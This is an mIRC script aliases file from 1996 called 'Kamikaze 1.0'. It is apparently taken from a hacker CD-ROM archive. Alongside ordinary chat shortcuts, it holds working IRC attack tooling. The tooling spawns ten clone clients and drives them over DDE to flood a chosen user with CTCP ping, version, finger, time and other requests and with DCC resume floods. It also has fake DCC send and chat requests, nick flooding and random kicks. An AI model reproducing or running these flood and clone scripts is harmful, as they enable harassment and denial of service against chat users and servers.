home *** CD-ROM | disk | FTP | other *** search
/ HaCKeRz KrOnIcKLeZ 3 / HaCKeRz_KrOnIcKLeZ.iso / scriptz / kamikaze.exe / akami.sz next >
INI File  |  1996-12-28  |  24KB  |  526 lines

  1. [Aliases]
  2. n0=;DON'T EDIT THESE ALIASES!
  3. n1=/F1 /onotice [Wall@P/ $+ # $+ / $+ $opnick(0,#) @Ps] $$?="Message for Ops:"
  4. n2=/F2 /onotice 4,1[Wall@P/ $+ # $+ / $+ $opnick(0,#) @Ps] $$?="Message for Ops:" $+ 
  5. n3=/F3 /sound $?="Sound filename" plays  ,╕╕,°ñ░`░ñ°,╕ $! ╕,°ñ░`░ñ°,╕╕, $?="Enter Message" 
  6. n4=/F4 /notice $chan 4,1[ChanNotice/ $+ # $+ / $+ $nick(0,#) People] $$?="Message for channel:" [Don't Respond]
  7. n5=/F5 /ignore *!*@* | /echo 4 .º. Ignoring everyone. Hit F6 to take this off | /timer 0 30 /echo 4 ***Ignoring everyone. Hit F6 to take this off
  8. n6=/F6 /ignore -r *!*@* | /timers off | /echo 4 .º. Ignore all has been taken off
  9. n7=/F10 /fserve $$?="Nick to FServe:" $$?="Maximum Gets:" $mircdir $+ fserve\ $mircdir $+ fserve\welcome.txt
  10. n8=/F11 /lwallops $$?="Local WallOPs to IRCops" 
  11. n9=/F12 /wallops $$?="WallOPs to IRCops" 
  12. n10=/woop /play woop.txt 0
  13. n11=/op /mode # +ooo $$1 $2 $3
  14. n12=/dop /mode # -ooo $$1 $2 $3
  15. n13=/global /msg $$1 Global Notice *2 Please Don't Respond
  16. n14=/add /msg q add # $$1 $$2
  17. n15=/aop /msg q aop # $$1 on
  18. n16=/remove /msg q remove # $1
  19. n17=/oplist /msg q list #
  20. n18=/pban /msg q pban # $1 *2
  21. n19=/pbans /msg q pbans #
  22. n20=/unpban /msg q unpban # $1
  23. n21=recho {
  24. n22=  if ($active == %sw) { echo -s *1 }
  25. n23=  else { echo $active *1 }
  26. n24=}
  27. n25=j {
  28. n26=  if ($1 == $NULL) { echo 5 -s .º. Usage: /j <channel> | halt }
  29. n27=  else goto next
  30. n28=  :next
  31. n29=  if # isin $$1 {   echo 3 -s .º. Attemping to join $$1 $+ ... | join $1 | halt }
  32. n30=  else { echo 3 -s .º. Attemping to join $1 $+ ...  | raw -q join #$$1 }
  33. n31=  halt
  34. n32=}
  35. n33=ghostchan {
  36. n34=  join $$1 $+ $chr(160)
  37. n35=}
  38. n36=fchan {
  39. n37=  join $$1 $+ $chr(160) $+ @ $+ $$2
  40. n38=}
  41. n39=opuser {
  42. n40=  if ($me isop $chan) { mode # +o $nick }
  43. n41=}
  44. n42=nick {
  45. n43=  if ($1 == $NULL) { echo 5 -s .º. Usage: /nick <newnick> | halt }
  46. n44=  else goto next
  47. n45=  :next
  48. n46=  nick $$1
  49. n47=  halt
  50. n48=}
  51. n49=/quit /quit 4,1Kamikaze 1.0 - r0x yer ass bizatch!
  52. n50=/r {
  53. n51=  set %i $replace(*1,$chr(32),á) | set %i $left(200,%i) | set %o $chr(3) $+ 4,1 | set %p 1 | set %c 1
  54. n52=  :loop
  55. n53=  set %o %o $+ $chr(3) $+ $token( %c , 38 , 4&7&8&9&11&13 ) $+ $mid(%p,1,%i) 
  56. n54=  inc %p
  57. n55=  if ( $mid(%p,1,%i) != á) { inc %c }
  58. n56=  if ( %c > 6 ) { set %c 1 }
  59. n57=  if ( $mid(%p,1,%i) != $null ) { goto loop }
  60. n58=  say %o
  61. n59=  unset %o %i %p %c
  62. n60=}
  63. n61=/cme /rc *1 | /me %say
  64. n62=/csay /rc *1 | /say %say
  65. n63=/rc {
  66. n64=  unset %say
  67. n65=  set %text *1
  68. n66=  set %loop 1
  69. n67=  set %max $len(*1)
  70. n68=  if $1 == 1 { set %loop 1 | set %max $len(*2) | set %text *2 | goto bold }
  71. n69=  :start
  72. n70=  set %colour.number $rand(1,13)
  73. n71=  if %colour.number = 8 { goto start } 
  74. n72=  set %char $mid( %loop, 1, %text)
  75. n73=  if %loop > %max goto end
  76. n74=  if %say == $null { set %say  $+ %colour.number $+ %char $+  | inc %loop | goto start }
  77. n75=  if %char == $null { set %say %say $+ . | inc %loop | goto start }
  78. n76=  set %say %say $+  $+ %colour.number $+ %char $+ 
  79. n77=  inc %loop
  80. n78=  goto start
  81. n79=  :bold
  82. n80=  set %other.number $rand(0, 3)
  83. n81=  set %colour.number $rand(1,13)
  84. n82=  if %colour.number = 8 { goto bold }
  85. n83=  set %char $mid( %loop, 1, %text)
  86. n84=  if %other.number = 0 { %burdo =  }
  87. n85=  if %other.number = 1 { %burdo =  }
  88. n86=  if %other.number = 2 { %burdo =  }
  89. n87=  if %other.number = 3 { %burdo =  }
  90. n88=  if %loop > %max goto end
  91. n89=  if %say == $null { set %say  $+ %colour.number $+ %burdo $+ %char $+  | inc %loop | goto bold }
  92. n90=  if %char == $null { set %say %say $+ . | inc %loop | goto bold }
  93. n91=  set %say %say $+  $+ %colour.number $+ %burdo $+ %char $+ 
  94. n92=  inc %loop
  95. n93=  goto bold
  96. n94=  :end
  97. n95=}
  98. n96=/p /part #
  99. n97=/n /names #$$1
  100. n98=/w /whois $$1
  101. n99=/opers /enable #opers | /who 0 o
  102. n100=/version /ctcp $$1 version
  103. n101=fakechat {
  104. n102=  raw -q privmsg $$?="Nick:" :DCC CHAT blah 3353362454 19 blah
  105. n103=}
  106. n104=/umode /echo $rand(1,6) -s .º. User Mode on $me $+ : $1 | /mode $me $1
  107. n105=/leetsay /say 4,1 $+ $replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace($replace(*1,w,W),e,Ω),o,÷),a,σ),b,▀),c,⌐),d,╨),f,ú),g,G),h,H),i,ε),j,J),k,K),l,L),m,M),n,±),o,≡),p,■),q,Q),r,«),s,º),t,T),u,√),v,V),x,X),z,Z),!,í),?,┐),0,░),y,Ñ),1,╣),2,▓),3,│) $+  
  108. n106=mkill {
  109. n107=  if ($1 == $NULL) { echo 5 -s .º. Usage: /mkill <hostmask> <reason> | halt }
  110. n108=  if ($1 == *) || ($1 == *!*@*) { echo 1 -s .º. 4,1Kamikaze 1.0 Cannot kill the whole net ya dork! | halt }
  111. n109=  echo 1 -s .º. 4,1Kamikaze 1.0 $?="Would you like to WARN or KILL?" Clones...
  112. n110=  if $! == kill goto kill
  113. n111=  if $! == warn goto warn
  114. n112=  goto done
  115. n113=  :kill
  116. n114=  echo 1 -s .º. 4,1Kamikaze 1.0 Killing Clients from $1 $+ ...
  117. n115=  set %mkill  $1
  118. n116=  set %mkillr *2
  119. n117=  if (%mkillr == $null) { set %mkillr Clone-ality! }
  120. n118=  enable #mkill
  121. n119=  who $1
  122. n120=  goto done
  123. n121=  :warn
  124. n122=  echo 1 -s .º. Kamikaze Warning Clients From $1 $+ ...
  125. n123=  set %warn  $1
  126. n124=  enable #killwarn
  127. n125=  who $1
  128. n126=  goto done
  129. n127=  :done
  130. n128=}
  131. n129=/textcusskick /kick $chan $nick %kickmsg
  132. n130=/nicker /nick $r(A,Z) $+ $r(0,9) $+ $r(a,z) $+ $r(0,9) $+ $r(A,Z) $+ $r(a,z) $+ $r(0,9) $+ $r(0,9) $+ $r(a,z) $+ $r(A,Z) $+ $r(1,9)
  133. n131=/restartserver /set %server $server | /quit | /server %server | /unset %server
  134. n132=supernova {
  135. n133=  if $nick == supernova goto supernova
  136. n134=  goto done
  137. n135=  :supernova
  138. n136=  if Possible isin $parms { echo $active 4,1-=[Possible Clones]=- |  echo $active 4,1-=[Clone Count: $parm3 $+ ]=- | echo $active 4,1-=[From: $parm6 $+ ]=- | beep } 
  139. n137=  :done
  140. n138=  halt
  141. n139=}
  142. n140=fakesend {
  143. n141=  raw -q privmsg $$?="Nick:" :DCC SEND $$?="Filename:" 3353362454 19 $$?="Filesize" $+ 
  144. n142=}
  145. n143=fakedcc {
  146. n144=  if ($parm5 == 19) {
  147. n145=    close -c $nick
  148. n146=    ignore -u60 $nick 3
  149. n147=    echo 1 -s .º. 4,1Fake DCC Chat from $nick $+ !
  150. n148=    beep
  151. n149=  }
  152. n150=}
  153. n151=changenick {
  154. n152=  :nick
  155. n153=  set %changenick $read $mircdir $+ nicks.txt
  156. n154=  if %changenick == $me goto nick
  157. n155=  nick %changenick
  158. n156=}
  159. n157=nickflood {
  160. n158=  set %menick $me
  161. n159=  timer 15 3 nicker
  162. n160=  timer 1 50 nick %menick
  163. n161=}
  164. n162=/encrypt {
  165. n163=  if $1 = $null { echo 12 $active .º. No text to encrypt! | halt }
  166. n164=  %temp = 1
  167. n165=  %tempchar = $mid( %temp, 1, *1 )
  168. n166=  tohex $asc( %tempchar )
  169. n167=  %string = ñMKñ $+ %hexval
  170. n168=  inc %temp
  171. n169=  :start
  172. n170=  if a $+ $mid( %temp, 1, *1 ) = a {
  173. n171=    %string = %string $+ 20
  174. n172=  }
  175. n173=  else {
  176. n174=    %tempchar = $mid( %temp, 1, *1 )
  177. n175=    tohex $asc( %tempchar )
  178. n176=    %string = %string $+ %hexval
  179. n177=  }
  180. n178=  inc %temp
  181. n179=  if %temp <= $len(*1) goto start
  182. n180=  say %string
  183. n181=  echo 12 $active > *1
  184. n182=  unset %temp %string
  185. n183=}
  186. n184=/tohex {
  187. n185=  %hexPart1 = $1 / 16
  188. n186=  %hextemp = %hexPart1 * 16
  189. n187=  %hexPart2 = $1 - %hextemp
  190. n188=  if %hexPart1 >= 0 && %hexPart1 < 10 { 
  191. n189=    set %part1 %hexPart1 
  192. n190=  }
  193. n191=  else {
  194. n192=    if %hexPart1 = 10 { %part1 = A }
  195. n193=    if %hexPart1 = 11 { %part1 = B }
  196. n194=    if %hexPart1 = 12 { %part1 = C }
  197. n195=    if %hexPart1 = 13 { %part1 = D }
  198. n196=    if %hexPart1 = 14 { %part1 = E }
  199. n197=    if %hexPart1 = 15 { %part1 = F }
  200. n198=  }
  201. n199=  if %hexPart2 >= 0 && %hexPart2 < 10 { 
  202. n200=    set %part2 %hexPart2 
  203. n201=  }
  204. n202=  else {
  205. n203=    if %hexPart2 = 10 { %part2 = A }
  206. n204=    if %hexPart2 = 11 { %part2 = B }
  207. n205=    if %hexPart2 = 12 { %part2 = C }
  208. n206=    if %hexPart2 = 13 { %part2 = D }
  209. n207=    if %hexPart2 = 14 { %part2 = E }
  210. n208=    if %hexPart2 = 15 { %part2 = F }
  211. n209=  }
  212. n210=  %hexval = %part1 $+ %part2
  213. n211=  unset %hextemp %part1 %part2 %hexPart1 %hexPart2
  214. n212=}
  215. n213=/decrypt {
  216. n214=  if $1 = $null { echo 12 $active .º. No text to decrypt! | halt }
  217. n215=  %temp = 1
  218. n216=  %tempchar = $mid( %temp, 2, *1 )
  219. n217=  todec %tempchar
  220. n218=  %string = $chr(%decval)
  221. n219=  %temp = %temp + 2
  222. n220=  :start
  223. n221=  if $mid( %temp, 2, *1 ) = 20 {
  224. n222=    %temp = %temp + 2  
  225. n223=    %tempchar = $mid( %temp, 2, *1 )
  226. n224=    todec %tempchar
  227. n225=    %string = %string $chr(%decval)
  228. n226=  }
  229. n227=  else {
  230. n228=    %tempchar = $mid( %temp, 2, *1 )
  231. n229=    todec %tempchar
  232. n230=    %string = %string $+ $chr(%decval)
  233. n231=  }
  234. n232=  %temp = %temp + 2
  235. n233=  if %temp <= $len(*1) goto start
  236. n234=  if $nick == $null { echo 12 $active > %string | unset %tempchar %temp %string | halt }
  237. n235=  echo 12 $active < $+ $nick $+ > %string
  238. n236=  unset %tempchar %temp %string
  239. n237=  halt
  240. n238=}
  241. n239=/todec {
  242. n240=  %hexPart1 = $left(1,$1)
  243. n241=  %hexPart2 = $right(1,$1)
  244. n242=  if %hexPart1 >= 0 && %hexPart1 < 10 { 
  245. n243=    %part1 = %hexPart1 * 16
  246. n244=  }
  247. n245=  else {
  248. n246=    if %hexPart1 = A { %part1 = 10 * 16 }
  249. n247=    if %hexPart1 = B { %part1 = 11 * 16 }
  250. n248=    if %hexPart1 = C { %part1 = 12 * 16 }
  251. n249=    if %hexPart1 = D { %part1 = 13 * 16 }
  252. n250=    if %hexPart1 = E { %part1 = 14 * 16 }
  253. n251=    if %hexPart1 = F { %part1 = 15 * 16 }
  254. n252=  }
  255. n253=  if %hexPart2 >= 0 && %hexPart2 < 10 { 
  256. n254=    %part2 = %hexPart2 
  257. n255=  }
  258. n256=  else {
  259. n257=    if %hexPart2 = A { %part2 = 10 }
  260. n258=    if %hexPart2 = B { %part2 = 11 }
  261. n259=    if %hexPart2 = C { %part2 = 12 }
  262. n260=    if %hexPart2 = D { %part2 = 13 }
  263. n261=    if %hexPart2 = E { %part2 = 14 }
  264. n262=    if %hexPart2 = F { %part2 = 15 }
  265. n263=  }
  266. n264=  %decval = %part1 + %part2
  267. n265=  unset %hextemp %part1 %part2 %hexPart1 %hexPart2
  268. n266=}
  269. n267=/q /query $$1
  270. n268=/hop /join #$$1 | /part #$$1
  271. n269=/send /dcc send $1 $2
  272. n270=/chat /dcc chat $1
  273. n271=/ping /ctcp $$1 ping
  274. n272=randping {
  275. n273=  set %ping $nick($r(1,$nick(0,#)),#) 
  276. n274=  ctcp %ping ping
  277. n275=}
  278. n276=randkick {
  279. n277=  set %kick $nick($r(1,$nick(0,#)),#) 
  280. n278=  kick $chan %kick Random Kickage
  281. n279=}
  282. n280=noticeflood {
  283. n281=  echo 4 -s .º. Notice flood by $nick $+ !
  284. n282=  if $nick isin $chan {
  285. n283=    if $me isop $chan {
  286. n284=      kick $chan $nick Notice Flood by $nick $+ ! 
  287. n285=      ban -u120 $nick 3 
  288. n286=      ignore -u120 $nick 3
  289. n287=    }
  290. n288=    else {
  291. n289=      ignore -u120 $nick 3
  292. n290=    }
  293. n291=  }
  294. n292=}
  295. n293=away {
  296. n294=  if ($1 == $NULL) { away | unset %away }
  297. n295=  else { away *1 | set %away AwAy - *1 }
  298. n296=}
  299. n297=ban {
  300. n298=  if ($1 == $NULL) || ($2 == $NULL) || ($3 == $NULL) || $POS($1,$CHR(42)) {
  301. n299=    echo 5 -s .º. Usage: /ban <channel> <nick> <0/1/2/3/4>
  302. n300=  }
  303. n301=  else goto next
  304. n302=  :next
  305. n303=  echo 4 .º. Banning $$2 from $chan $+ ...
  306. n304=  ban $$1 $$2 $$3
  307. n305=}
  308. n306=ctcp {
  309. n307=  if ($1 == $NULL) || ($2 == $NULL) || $POS($1,$CHR(42)) {
  310. n308=    echo 5 -s .º. Usage: /ctcp <nick> <ping/version/finger/userinfo/clientinfo>
  311. n309=  }
  312. n310=  else goto next
  313. n311=  :next
  314. n312=  if $$2 == ping goto ping
  315. n313=  else goto next2
  316. n314=  :next2
  317. n315=  if $$2 == finger goto finger
  318. n316=  else goto next3
  319. n317=  :next3
  320. n318=  if $$2 == version goto version
  321. n319=  else goto next4
  322. n320=  :next4
  323. n321=  if $$2 == trout goto trout
  324. n322=  else goto next5
  325. n323=  :next5
  326. n324=  if $$2 == clientinfo goto clientinfo
  327. n325=  else goto next6
  328. n326=  :next6
  329. n327=  if $$2 == userinfo goto userinfo
  330. n328=  else goto next7
  331. n329=  :next7
  332. n330=  if $$2 == time goto time
  333. n331=  else goto other
  334. n332=  :ping
  335. n333=  echo 5 -s .º. Pinging $$1 $+ ...
  336. n334=  ctcp $$1 ping
  337. n335=  goto end
  338. n336=  :version
  339. n337=  echo 5 -s .º. Client Version of $$1 $+ ...
  340. n338=  ctcp $$1 version
  341. n339=  goto end
  342. n340=  :finger
  343. n341=  echo 5 -s .º. Finger Info on $$1 $+ ...
  344. n342=  ctcp $$1 finger
  345. n343=  goto end
  346. n344=  :trout
  347. n345=  echo 5 -s .º. Trout CTCP to $$1 $+ ...
  348. n346=  ctcp $$1 trout
  349. n347=  goto end
  350. n348=  :userinfo
  351. n349=  echo 5 -s .º. UserInfo on $$1 $+ ...
  352. n350=  ctcp $$1 userinfo
  353. n351=  goto end
  354. n352=  :clientinfo
  355. n353=  echo 5 -s .º. ClientInfo of $$1 $+ ...
  356. n354=  ctcp $$1 clientinfo
  357. n355=  goto end
  358. n356=  :time
  359. n357=  echo 5 -s .º. Time of $$1 $+ ...
  360. n358=  ctcp $$1 time
  361. n359=  goto end
  362. n360=  :other
  363. n361=  echo 5 -s .º. $$2 to $$1 $+ ...
  364. n362=  ctcp $$1 *2
  365. n363=  goto end
  366. n364=  :end
  367. n365=  halt
  368. n366=}
  369. n367=join {
  370. n368=  if ($1 == $NULL) || $POS($1,$CHR(42)) {
  371. n369=    echo 5 -s .º. Usage: /join <channel>
  372. n370=  }
  373. n371=  else {
  374. n372=    echo 3 -s .º. Attemping to join $$1 $+ ... 
  375. n373=    join $$1
  376. n374=  }
  377. n375=}
  378. n376=invite {
  379. n377=  if ($1 == $NULL) || ($2 == $NULL) || $POS($1,$CHR(42)) {
  380. n378=    echo 5 -s.º. Usage: /invite <nick> <channel>
  381. n379=  }
  382. n380=  else { 
  383. n381=    invite $$1 $$2
  384. n382=  }
  385. n383=}
  386. n384=msg {
  387. n385=  if $ isin $$1 { 
  388. n386=    msg $$1 *2
  389. n387=    goto end
  390. n388=  }
  391. n389=  else goto next
  392. n390=  :next
  393. n391=  if ($1 == $NULL) || ($2 == $NULL) || $POS($1,$CHR(42)) {
  394. n392=    echo 5 -s .º. Usage: /msg <nick> <text>
  395. n393=    goto end
  396. n394=  }
  397. n395=  else { 
  398. n396=    msg $$1 *2
  399. n397=    goto end
  400. n398=  }
  401. n399=  :end
  402. n400=  halt
  403. n401=}
  404. n402=whois {
  405. n403=  if ($1 == $NULL) || $POS($1,$CHR(42)) {
  406. n404=    echo 5 -s .º. Usage: /whois <nick>
  407. n405=  }
  408. n406=  else { 
  409. n407=    whois $$1
  410. n408=  }
  411. n409=}
  412. n410=me {
  413. n411=  if ($1 == $NULL) {
  414. n412=    echo 5 -s .º. Usage: /me <text>
  415. n413=  }
  416. n414=  else {
  417. n415=    me *1
  418. n416=  }
  419. n417=}
  420. n418=kick {
  421. n419=  if ($1 == $NULL) || ($2 == $NULL) || $POS($1,$CHR(42)) {
  422. n420=    echo 5 -s .º. Usage: /kick <channel> <nick> <reason>
  423. n421=  }
  424. n422=  if ($me !isop $chan) { kick $$1 $$2 4,1Kickality- $+ $me | halt }
  425. n423=  if ($3 == $NULL) || $POS($1,$CHR(42)) { kick $$1 $$2 4,1KaZeKick- $+ $me | halt }
  426. n424=  else { kick $$1 $$2 4,1Kickality- $+ *3 | halt }
  427. n425=}
  428. n426=}
  429. n427=/part  /echo 3 -s .º. Attemping to part $$1 $+ ... | /part $$1
  430. n428=loading {
  431. n429=load -p kami.sz
  432. n430=load -c kami.sz
  433. n431=load -e kami.sz
  434. n432=load -u kami.sz
  435. n433=load -v kami.sz
  436. n434=load -r kami.sz
  437. n435=set %date $adate 
  438. n436=set %autounb kick
  439. n437=set %ban 4
  440. n438=set %time $timestamp
  441. n439=set %sw status window
  442. n440=ignore -r *!*@*
  443. n441=echo $rand(1,6) -s .º. Enabling User Modes...
  444. n442=umode +i
  445. n443=echo $rand(1,6) -s .º. 4,1Kamikaze 1.0 activated on $day ( $+ $adate $+ ) at $timestamp on $server
  446. n444=echo $rand(1,6) -s .º. 4,1Kamikaze 1.0 by AlphaDH2 loaded and READY
  447. n445=}
  448. n446=userstat {
  449. n447=echo $rand(1,6) -s .º. 4,1Kamikaze 1.0 User Status...
  450. n448=echo $rand(1,6) -s .º. You are $me at $host ( $+ $ip $+ )
  451. n449=echo $rand(1,6) -s .º. You are on $server on port $port 
  452. n450=echo $rand(1,6) -s .º. You logged in at %time on %date
  453. n451=if $active != $null { echo $rand(1,6) -s .º. Active window is $active }
  454. n452=if $channel(0) != 0 { echo $rand(1,13) -s .º. You are in $channel(0) channel(s) - $channel(1) $channel(2) $channel(3) $channel(4) $channel(5) $channel(6) $channel(7) $channel(8) $channel(9) $channel(10) }
  455. n453=if $query(0) != 0 { echo $rand(1,6) -s .º. You have $query(0) query window(s) open - $query(1) $query(2) $query(3) $query(4) $query(5) }
  456. n454=if $send(0) != 0 { echo $rand(1,6) -s .º. You have $send(0) send(s) open - $send(1) $send(2) $send(3) $send(4) $send(5) }
  457. n455=if $chat(0) != 0 { echo $rand(1,6) -s .º. You have $chat(0) chat(s) open - $chat(1) $chat(2) $chat(3) $chat(4) $chat(5) }
  458. n456=if $away == $true { echo $rand(1,6) -s .º. You are marked AWAY }
  459. n457=echo $rand(1,6) -s .º. End 4,1Kamikaze 1.0 User Status...
  460. n458=}
  461. n459=/rkill { 
  462. n460=dde sphere1 command "" /rkill $$1 | dde sphere2 command "" /rkill $$1 | dde sphere3 command "" /rkill $$1 | dde sphere4 command "" /rkill $$1 | dde sphere5 command "" /rkill $$1 | dde sphere6 command "" /rkill $$1 | dde sphere7 command "" /rkill $$1 | dde sphere8 command "" /rkill $$1 | dde sphere9 command "" /rkill $$1 | dde sphere10 command "" /rkill $$1 | echo 2 DCC Resume Flooding $$1
  463. n461=.timer 1 60 echo 2 DCC Resume Flood on $$1 Complete! 
  464. n462=} 
  465. n463=/vkill { 
  466. n464=dde sphere1 command "" /vkill $$1 | dde sphere2 command "" /vkill $$1 | dde sphere3 command "" /vkill $$1 | dde sphere4 command "" /vkill $$1 | dde sphere5 command "" /vkill $$1 | dde sphere6 command "" /vkill $$1 | dde sphere7 command "" /vkill $$1 | dde sphere8 command "" /vkill $$1 | dde sphere9 command "" /vkill $$1 | dde sphere10 command "" /vkill $$1 | echo 2 Version Flooding $$1 
  467. n465=.timer 1 60 echo 2 Version Flood on $$1 Complete! 
  468. n466=} 
  469. n467=/ekill { 
  470. n468=dde sphere1 command "" /ekill $$1 | dde sphere2 command "" /ekill $$1 | dde sphere3 command "" /ekill $$1 | dde sphere4 command "" /ekill $$1 | dde sphere5 command "" /ekill $$1 | dde sphere6 command "" /ekill $$1 | dde sphere7 command "" /ekill $$1 | dde sphere8 command "" /ekill $$1 | dde sphere9 command "" /ekill $$1 | dde sphere10 command "" /ekill $$1 | echo 2 Echo Flooding $$1
  471. n469=.timer 1 30 echo 2 Echo Flood on $$1 Complete! 
  472. n470=} 
  473. n471=/pkill { 
  474. n472=dde sphere1 command "" /pkill $$1 | dde sphere2 command "" /pkill $$1 | dde sphere3 command "" /pkill $$1 | dde sphere4 command "" /pkill $$1 | dde sphere5 command "" /pkill $$1 | dde sphere6 command "" /pkill $$1 | dde sphere7 command "" /pkill $$1 | dde sphere8 command "" /pkill $$1 | dde sphere9 command "" /pkill $$1 | dde sphere10 command "" /pkill $$1 | echo 2 Ping Flooding $$1
  475. n473=.timer 1 60 echo 2 Ping Flood on $$1 Complete!
  476. n474=} 
  477. n475=/ckill { 
  478. n476=dde sphere1 command "" /ckill $$1 | dde sphere2 command "" /ckill $$1 | dde sphere3 command "" /ckill $$1 | dde sphere4 command "" /ckill $$1 | dde sphere5 command "" /ckill $$1 | dde sphere6 command "" /ckill $$1 | dde sphere7 command "" /ckill $$1 | dde sphere8 command "" /ckill $$1 | dde sphere9 command "" /ckill $$1 | dde sphere10 command "" /ckill $$1 | echo 2 Clientinfo Flooding $$1
  479. n477=.timer 1 60 echo 2 Clientinfo Flood on $$1 Complete!
  480. n478=} 
  481. n479=/ukill { 
  482. n480=dde sphere1 command "" /ukill $$1 | dde sphere2 command "" /ukill $$1 | dde sphere3 command "" /ukill $$1 | dde sphere4 command "" /ukill $$1 | dde sphere5 command "" /ukill $$1 | dde sphere6 command "" /ukill $$1 | dde sphere7 command "" /ukill $$1 | dde sphere8 command "" /ukill $$1 | dde sphere9 command "" /ukill $$1 | dde sphere10 command "" /ukill $$1 | echo 2 Userinfo Flooding $$1 
  483. n481=.timer 1 60 echo 2 Userinfo Flood on $$1 Complete!
  484. n482=} 
  485. n483=/tkill { 
  486. n484=dde sphere1 command "" /tkill $$1 | dde sphere2 command "" /tkill $$1 | dde sphere3 command "" /tkill $$1 | dde sphere4 command "" /tkill $$1 | dde sphere5 command "" /tkill $$1 | dde sphere6 command "" /tkill $$1 | dde sphere7 command "" /tkill $$1 | dde sphere8 command "" /tkill $$1 | dde sphere9 command "" /tkill $$1 | dde sphere10 command "" /tkill $$1 | echo 2 Time Flooding $$1
  487. n485=.timer 1 60 echo 2 Time Flood on $$1 Complete! 
  488. n486=}
  489. n487=/fkill { 
  490. n488=dde sphere1 command "" /fkill $$1 | dde sphere2 command "" /fkill $$1 | dde sphere3 command "" /fkill $$1 | dde sphere4 command "" /fkill $$1 | dde sphere5 command "" /fkill $$1 | dde sphere6 command "" /fkill $$1 | dde sphere7 command "" /fkill $$1 | dde sphere8 command "" /fkill $$1 | dde sphere9 command "" /fkill $$1 | dde sphere10 command "" /fkill $$1 | echo 2 Finger Flooding $$1 
  491. n489=.timer 1 60 echo 2 Finger Flood on $$1 Complete! 
  492. n490=}
  493. n491=/vkami { 
  494. n492=dde sphere1 command "" /vkami $$1 | dde sphere2 command "" /vkami $$1 | dde sphere3 command "" /vkami $$1 | dde sphere4 command "" /vkami $$1 | dde sphere5 command "" /vkami $$1 | dde sphere6 command "" /vkami $$1 | dde sphere7 command "" /vkami $$1 | dde sphere8 command "" /vkami $$1 | dde sphere9 command "" /vkami $$1 | dde sphere10 command "" /vkami $$1 | echo 2 KamiKaZe Version Flooding $$1 
  495. n493=.timer 1 60 echo 2 KamiKaZe Version Flood on $$1 Complete! 
  496. n494=} 
  497. n495=/ekami { 
  498. n496=dde sphere1 command "" /ekami $$1 | dde sphere2 command "" /ekami $$1 | dde sphere3 command "" /ekami $$1 | dde sphere4 command "" /ekami $$1 | dde sphere5 command "" /ekami $$1 | dde sphere6 command "" /ekami $$1 | dde sphere7 command "" /ekami $$1 | dde sphere8 command "" /ekami $$1 | dde sphere9 command "" /ekami $$1 | dde sphere10 command "" /ekami $$1 | echo 2 KamiKaZe Echo Flooding $$1
  499. n497=.timer 1 30 echo 2 KamiKaZe Echo Flood on $$1 Complete! 
  500. n498=} 
  501. n499=/pkami { 
  502. n500=dde sphere1 command "" /pkami $$1 | dde sphere2 command "" /pkami $$1 | dde sphere3 command "" /pkami $$1 | dde sphere4 command "" /pkami $$1 | dde sphere5 command "" /pkami $$1 | dde sphere6 command "" /pkami $$1 | dde sphere7 command "" /pkami $$1 | dde sphere8 command "" /pkami $$1 | dde sphere9 command "" /pkami $$1 | dde sphere10 command "" /pkami $$1 | echo 2 KamiKaZe Ping Flooding $$1
  503. n501=.timer 1 60 echo 2 KamiKaZe Ping Flood on $$1 Complete!
  504. n502=} 
  505. n503=/ckami { 
  506. n504=dde sphere1 command "" /ckami $$1 | dde sphere2 command "" /ckami $$1 | dde sphere3 command "" /ckami $$1 | dde sphere4 command "" /ckami $$1 | dde sphere5 command "" /ckami $$1 | dde sphere6 command "" /ckami $$1 | dde sphere7 command "" /ckami $$1 | dde sphere8 command "" /ckami $$1 | dde sphere9 command "" /ckami $$1 | dde sphere10 command "" /ckami $$1 | echo 2 KamiKaZe Clientinfo Flooding $$1
  507. n505=.timer 1 60 echo 2 KamiKaZe Clientinfo Flood on $$1 Complete!
  508. n506=} 
  509. n507=/fkami { 
  510. n508=dde sphere1 command "" /fkami $$1 | dde sphere2 command "" /fkami $$1 | dde sphere3 command "" /fkami $$1 | dde sphere4 command "" /fkami $$1 | dde sphere5 command "" /fkami $$1 | dde sphere6 command "" /fkami $$1 | dde sphere7 command "" /fkami $$1 | dde sphere8 command "" /fkami $$1 | dde sphere9 command "" /fkami $$1 | dde sphere10 command "" /fkami $$1 | echo 2 KamiKaZe Finger Flooding $$1 
  511. n509=.timer 1 60 echo 2 KamiKaZe Finger Flood on $$1 Complete! 
  512. n510=}
  513. n511=/af1 /run $mircdir $+ mirc32.exe $mircdir $+ clones\mirc01.ini | /inc %clonenum 1
  514. n512=/af2 /run $mircdir $+ mirc32.exe $mircdir $+ clones\mirc02.ini | /inc %clonenum 1
  515. n513=/af3 /run $mircdir $+ mirc32.exe $mircdir $+ clones\mirc03.ini | /inc %clonenum 1
  516. n514=/af4 /run $mircdir $+ mirc32.exe $mircdir $+ clones\mirc04.ini | /inc %clonenum 1
  517. n515=/af5 /run $mircdir $+ mirc32.exe $mircdir $+ clones\mirc05.ini | /inc %clonenum 1
  518. n516=/af6 /run $mircdir $+ mirc32.exe $mircdir $+ clones\mirc06.ini | /inc %clonenum 1
  519. n517=/af7 /run $mircdir $+ mirc32.exe $mircdir $+ clones\mirc07.ini | /inc %clonenum 1
  520. n518=/af8 /run $mircdir $+ mirc32.exe $mircdir $+ clones\mirc08.ini | /inc %clonenum 1
  521. n519=/af9 /run $mircdir $+ mirc32.exe $mircdir $+ clones\mirc09.ini | /inc %clonenum 1
  522. n520=/af10 /run $mircdir $+ mirc32.exe $mircdir $+ clones\mirc10.ini | /inc %clonenum 1
  523. n521=/cf11 { dde sphere1 command "" /rand | dde sphere2 command "" /rand | dde sphere3 command "" /rand | dde sphere4 command "" /rand | dde sphere5 command "" /rand | dde sphere6 command "" /rand | dde sphere7 command "" /rand | dde sphere8 command "" /rand | dde sphere9 command "" /rand | dde sphere10 command "" /rand | echo 4 All Clones Have Random Nicks (KamiKaZe) }
  524. n522=/cf12 { dde sphere1 command "" /exit | dde sphere2 command "" /exit | dde sphere3 command "" /exit | dde sphere4 command "" /exit | dde sphere5 command "" /exit | dde sphere6 command "" /exit | dde sphere7 command "" /exit | dde sphere8 command "" /exit | dde sphere9 command "" /exit | dde sphere10 command "" /exit | echo 4 # All CLones Have Been Killed (KamiKaZe) }
  525. n523=;END EDIT
  526.